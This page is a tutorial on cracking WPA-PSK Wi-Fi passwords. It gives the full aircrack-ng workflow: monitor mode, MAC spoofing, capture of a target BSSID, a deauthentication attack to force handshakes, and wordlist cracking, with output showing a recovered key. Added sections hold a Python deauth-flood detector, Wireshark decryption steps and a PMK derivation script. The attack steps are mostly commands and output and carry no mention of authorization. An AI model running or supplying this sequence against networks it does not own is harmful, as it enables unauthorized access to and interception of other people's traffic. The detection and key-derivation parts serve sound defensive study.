Cracking WPA-PSK
Prerequisites
sudo apt install macchanger wireshark aircrack-ng -y
Steps
# Make sure the built-in wifi adapter (wlan0) is turned off
sudo ifconfig wlan0 down &&
# Change the MAC address of the external adapter (optional) for a clean operation
sudo macchanger -A atheros0 &&
# Turn on monitor mode; airmon-ng prints the name of the monitor interface it creates
# (the remaining steps assume it is wlan0mon)
sudo airmon-ng start atheros0
# List all active access points (airodump-ng takes the interface directly; there is no "start" subcommand)
sudo airodump-ng wlan0mon
# Dump a specific access point (channel 10, BSSID of the target) to capture files with the prefix /root/tap/log
sudo airodump-ng -c 10 --bssid D0:D0:4B:0E:CD:28 -w /root/tap/log wlan0mon
# Deauthenticate clients so that they reconnect and the 4-way handshake ends up in the capture
sudo aireplay-ng --deauth 10 -a D0:D0:4B:0E:CD:28 wlan0mon
# Crack the WPA-PSK key offline from the captured handshake with a wordlist
# (airodump-ng names the first capture file <prefix>-01.cap)
sudo aircrack-ng -b D0:D0:4B:0E:CD:28 /root/tap/log-01.cap -w /root/tap/wordlist
Results:
Aircrack-ng 1.2 rc4
[00:00:00] 1/1 keys tested (229.15 k/s)
Time left: 0 seconds 100.00%
KEY FOUND! [ mySecretPassword ]
Master Key : 66 F4 7E 50 07 97 A3 00 19 23 47 6C 99 18 90 17
BE 51 91 35 51 71 44 4B 7C F5 CE 60 65 5C 8D B9
Transient Key : 0E 8C 7B FD F4 0B 79 FB AC 00 40 3E 9F 41 01 AF
95 81 10 62 A0 BF 8A E1 42 DA 8B EA 7B 59 53 A6
28 7E 83 66 22 16 9B 58 AE 5B 5C C0 7D 43 F4 32
F5 2E 48 F2 01 D3 10 BE E7 F6 13 FA 4A 53 84 B2
EAPOL HMAC : 36 BD 83 91 02 F1 C1 45 3C B4 83 54 24 6D AD 45
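The aireplay-ng --deauth step above is exactly what a wireless IDS watches for: deauthentication frames are unauthenticated management frames (unless the network uses Protected Management Frames, 802.11w, which is the actual fix), so a burst of them sent to the broadcast address and carrying the AP's BSSID is a reliable sign that somebody is forcing clients off the network. The Python below is an added example, not code from this page or from the aircrack-ng project. It parses raw 802.11 management frames (radiotap header already stripped), counts deauthentication frames per BSSID and flags any BSSID over a threshold. The sample frames are constructed inline; the BSSID reused is the page's, the client and second AP addresses are made up.

```python
import struct
from collections import Counter

# IEEE 802.11 frame control, first byte: subtype (4 bits) | type (2 bits) | version (2 bits).
# Type 0 is management; subtype 12 is deauthentication, subtype 8 is beacon.
FC_MGMT_DEAUTH = (12 << 4) | (0 << 2)   # 0xC0
FC_MGMT_BEACON = (8 << 4) | (0 << 2)    # 0x80
MGMT_HDR_LEN = 24  # FC(2) + duration(2) + addr1(6) + addr2(6) + addr3(6) + seq-ctl(2)
BROADCAST = "FF:FF:FF:FF:FF:FF"


def mac_to_bytes(m):
    return bytes(int(x, 16) for x in m.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02X}" for x in b)


def build_mgmt_frame(fc0, addr1, addr2, addr3, body=b"", seq=0):
    """Build a raw 802.11 management frame. Used only to construct the sample
    capture below; a real detector would read frames from a pcap or a monitor interface."""
    hdr = struct.pack("<BBH", fc0, 0, 0)                     # frame control (2 bytes), duration
    hdr += mac_to_bytes(addr1) + mac_to_bytes(addr2) + mac_to_bytes(addr3)
    hdr += struct.pack("<H", seq << 4)                       # sequence number in the top 12 bits
    return hdr + body


def parse_frame(frame):
    """Decode type/subtype and addresses of a raw 802.11 frame; for deauthentication
    frames also decode the reason code. Returns None for frames too short to parse."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc0 = frame[0]
    info = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": bytes_to_mac(frame[4:10]),   # receiver
        "addr2": bytes_to_mac(frame[10:16]),  # transmitter
        "addr3": bytes_to_mac(frame[16:22]),  # BSSID for management frames
        "reason": None,
    }
    if info["type"] == 0 and info["subtype"] == 12 and len(frame) >= MGMT_HDR_LEN + 2:
        info["reason"] = struct.unpack_from("<H", frame, MGMT_HDR_LEN)[0]
    return info


def deauth_counts(frames):
    """Number of deauthentication frames seen per BSSID."""
    counts = Counter()
    for frame in frames:
        info = parse_frame(frame)
        if info is not None and info["reason"] is not None:
            counts[info["addr3"]] += 1
    return counts


def detect_deauth_flood(frames, threshold=5):
    """Return [(bssid, count)] for every BSSID with at least `threshold` deauth frames in
    the window `frames` covers. A single deauth is normal (a client leaving); a burst of
    them, especially sent to the broadcast address, is not."""
    return sorted((b, c) for b, c in deauth_counts(frames).items() if c >= threshold)


# ---- constructed sample capture (not real traffic) ----
AP = "D0:D0:4B:0E:CD:28"        # BSSID from the page's example
OTHER_AP = "02:00:00:00:00:01"  # constructed, unrelated network
CLIENT = "02:00:00:00:00:02"    # constructed client

SAMPLE = []
for i in range(3):  # background beacons from both APs; the detector ignores them
    SAMPLE.append(build_mgmt_frame(FC_MGMT_BEACON, BROADCAST, AP, AP, b"\x00" * 12, seq=i))
    SAMPLE.append(build_mgmt_frame(FC_MGMT_BEACON, BROADCAST, OTHER_AP, OTHER_AP, b"\x00" * 12, seq=i))
# one legitimate deauth: a client telling OTHER_AP that it is leaving (reason code 3)
SAMPLE.append(build_mgmt_frame(FC_MGMT_DEAUTH, OTHER_AP, CLIENT, OTHER_AP, struct.pack("<H", 3)))
# a burst of 20 broadcast deauths carrying AP as transmitter and BSSID (reason code 7):
# the pattern a deauth flood against AP leaves behind in a capture
for i in range(20):
    SAMPLE.append(build_mgmt_frame(FC_MGMT_DEAUTH, BROADCAST, AP, AP, struct.pack("<H", 7), seq=i))

if __name__ == "__main__":
    print("deauth frames per BSSID:", dict(deauth_counts(SAMPLE)))
    for bssid, n in detect_deauth_flood(SAMPLE):
        print(f"ALERT: {n} deauthentication frames against {bssid} in this window")
```

In a real deployment the window is a few seconds of frames from a monitor interface rather than a fixed list, and the threshold is tuned to the site; the point is that the legitimate single deauth stays below it while the burst does not. Enabling 802.11w on the AP removes the problem at the source, because a client then drops deauthentication frames that are not integrity-protected.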
Decrypt WLAN (IEEE 802.11) packets
- Open Wireshark.
- If you have the WPA-PSK key, go to Edit -> Preferences -> Capture and set wlan0mon as the default interface.
- Enable decryption under Edit -> Preferences -> Protocols -> IEEE 802.11 and assign the WPA-PSK key there.
- To get the WPA-PSK key, you can generate it using this tool.
- Start the capture using the wlan0mon interface.
Reference: https://geekviews.tech/aircrack-ng-tutorial/
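The "Master Key" in the results above is the WPA-PSK itself (the PMK), and it is the same value Wireshark wants under the IEEE 802.11 decryption preferences when you decrypt your own network's traffic. The following Python is an added example, not code from this page, from aircrack-ng or from Wireshark. It derives the key the way IEEE 802.11i defines it (PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 iterations, 32 bytes of output) and prints it both in Wireshark's key syntax and in aircrack-ng's Master Key layout. The passphrase/SSID pair is the published 802.11i test vector, not the page's network, whose SSID is not given.

```python
import hashlib


def wpa_psk(passphrase, ssid):
    """WPA-PSK / PMK as defined in IEEE 802.11i:
    PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes of output)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def wireshark_decryption_keys(passphrase, ssid):
    """The two equivalent entries Wireshark accepts under
    Edit -> Preferences -> Protocols -> IEEE 802.11 -> Decryption keys:
    the passphrase form and the derived-key (hex) form."""
    return [f"wpa-pwd:{passphrase}:{ssid}", f"wpa-psk:{wpa_psk(passphrase, ssid).hex()}"]


def format_like_aircrack(key):
    """Render a key the way aircrack-ng prints 'Master Key': 16 hex pairs per row."""
    pairs = [f"{b:02X}" for b in key]
    return "\n".join(" ".join(pairs[i:i + 16]) for i in range(0, len(pairs), 16))


if __name__ == "__main__":
    # Published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"),
    # used instead of the page's network because its SSID is not on the page.
    psk = wpa_psk("password", "IEEE")
    print("Master Key :", format_like_aircrack(psk).replace("\n", "\n             "))
    for entry in wireshark_decryption_keys("password", "IEEE"):
        print(entry)
```

The derivation depends only on the passphrase and the SSID and always runs the same 4096 iterations, so nothing in it is secret except the passphrase. That is why the cracking step above works offline against a captured handshake at the rate the results show (229.15 k/s), and why a dictionary word such as the one in the results falls on the first try; the length and unpredictability of the passphrase are the only protection a WPA-PSK network has.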